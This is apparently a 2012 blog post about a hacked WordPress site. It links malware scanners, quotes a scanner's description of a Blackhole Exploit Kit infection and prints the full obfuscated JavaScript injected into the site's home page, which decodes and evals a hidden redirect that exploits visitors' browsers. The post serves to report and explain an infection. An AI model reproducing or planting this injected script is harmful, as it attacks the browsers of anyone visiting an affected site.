Tuesday, July 17, 2012

wordpress site hacked

With so many updated to wordpress i would have thought the platform was safer from being hacked.

you can scan you website for malware with
http://sitecheck.sucuri.net/scanner/


https://www.virustotal.com/#url (DO NOT DETECT MALWARE)

I got a site with some weird js code on the home page

http://labs.sucuri.net/
Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole2
http://labs.sucuri.net/?details=asjo.com.br

An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Jun).
Note that any PHP, JS or .htaccess could be compromised by this type of malware.


Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.


< script >try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="81.90.945.1020.288.400.900.1110.891.1170.981.1010.990.1160.414.1030.909.1160.621.1080.909.1090.909.1100.1044.1150.594.1210.756.970.927.780.873.1090.909.400.351.980.999.1000.1089.390.369.910.432.930.369.1230.117.90.81.90.945.1020.1026.970.981.1010.1026.400.369.590.117.90.81.1250.288.1010.972.1150.909.320.1107.130.81.90.81.1000.999.990.1053.1090.909.1100.1044.460.1071.1140.945.1160.909.400.306.600.945.1020.1026.970.981.1010.288.1150.1026.990.549.390.936.1160.1044.1120.522.470.423.1090.882.1020.1017.1020.909.1170.414.500.477.1170.414.990.999.1090.423.1000.423.520.432.520.414.1120.936.1120.567.1030.999.610.441.390.288.1190.945.1000.1044.1040.549.390.441.480.351.320.936.1010.945.1030.936.1160.549.390.441.480.351.320.1035.1160.1089.1080.909.610.351.1180.945.1150.945.980.945.1080.945.1160.1089.580.936.1050.900.1000.909.1100.531.1120.999.1150.945.1160.945.1110.990.580.873.980.1035.1110.972.1170.1044.1010.531.1080.909.1020.1044.580.432.590.1044.1110.1008.580.432.590.351.620.540.470.945.1020.1026.970.981.1010.558.340.369.590.117.90.81.1250.117.90.81.1020.1053.1100.891.1160.945.1110.990.320.945.1020.1026.970.981.1010.1026.400.369.1230.117.90.81.90.1062.970.1026.320.918.320.549.320.900.1110.891.1170.981.1010.990.1160.414.990.1026.1010.873.1160.909.690.972.1010.981.1010.990.1160.360.390.945.1020.1026.970.981.1010.351.410.531.1020.414.1150.909.1160.585.1160.1044.1140.945.980.1053.1160.909.400.351.1150.1026.990.351.440.351.1040.1044.1160.1008.580.423.470.981.980.918.1130.918.1010.1053.460.450.530.1053.460.891.1110.981.470.900.470.468.480.468.460.1008.1040.1008.630.927.1110.549.490.351.410.531.1020.414.1150.1044.1210.972.1010.414.1180.945.1150.945.980.945.1080.945.1160.1089.610.351.1040.945.1000.900.1010.990.390.531.1020.414.1150.1044.1210.972.1010.414.1120.999.1150.945.1160.945.1110.990.610.351.970.882.1150.999.1080.1053.1160.909.390.531.1020.414.1150.1044.1210.972.1010.414.1080.909.1020.1044.610.351.480.351.590.918.460.1035.1160.1089.1080.909.460.1044.1110.1008.610.351.480.351.590.918.460.1035.1010.1044.650.1044.1160.1026.1050.882.1170.1044.1010.360.390.1071.1050.900.1160.936.390.396.390.441.480.351.410.531.1020.414.1150.909.1160.585.1160.1044.1140.945.980.1053.1160.909.400.351.1040.909.1050.927.1040.1044.390.396.390.441.480.351.410.531.130.81.90.81.1000.999.990.1053.1090.909.1100.1044.460.927.1010.1044.690.972.1010.981.1010.990.1160.1035.660.1089.840.873.1030.702.970.981.1010.360.390.882.1110.900.1210.351.410.819.480.837.460.873.1120.1008.1010.990.1000.603.1040.945.1080.900.400.918.410.531.130.81.90.1125".split(".");h=2;s="";if(window["document"])for(i=0;-583+i<0;i=1+i){k=i;s=s+String.fromCharCode(n[k]/(i%(h)+9));}if(012===10)e(s);}< /script >

No comments:

Post a Comment